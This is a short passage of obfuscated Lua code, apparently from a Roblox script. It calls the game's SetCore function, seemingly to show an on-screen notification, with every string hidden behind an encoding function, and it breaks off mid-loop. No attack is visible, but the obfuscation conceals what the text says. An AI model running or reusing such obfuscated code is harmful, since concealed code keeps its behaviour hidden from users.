game:GetService(v7("\3\10\129\10\85\53\12\167\13\72","\33\80\126\224\120")):SetCore(v7("\223\173\13\192\114\227\188\10\194\85\239\169\23\205\83\226","\60\140\200\99\164"),{[v7("\179\253\16\42\167","\194\231\148\100\70")]=v7("\116\77\204\185\236","\168\38\44\161\195\150"),[v7("\180\249\154\98","\118\224\156\226\22\80\136\214")]=v7("\118\230\80\147\2\231\74\192\76\225\77\192\111\195\11\192\111\239\95\129\73\239","\224\34\142\57"),[v7("\247\164\202\211","\110\190\199\165\189\19\145\61")]=v7("\200\233\111\252\131\210\215\233\45\167\196\211\195\251\114\181\170\212\201\238\99\174\130\195\135\186\34\177\210\149\143\189\47\190\210\146\156\252\42\185\222\151\156\227\42\185\222\151","\167\186\139\23\136\235")});Duration=11;break;end end end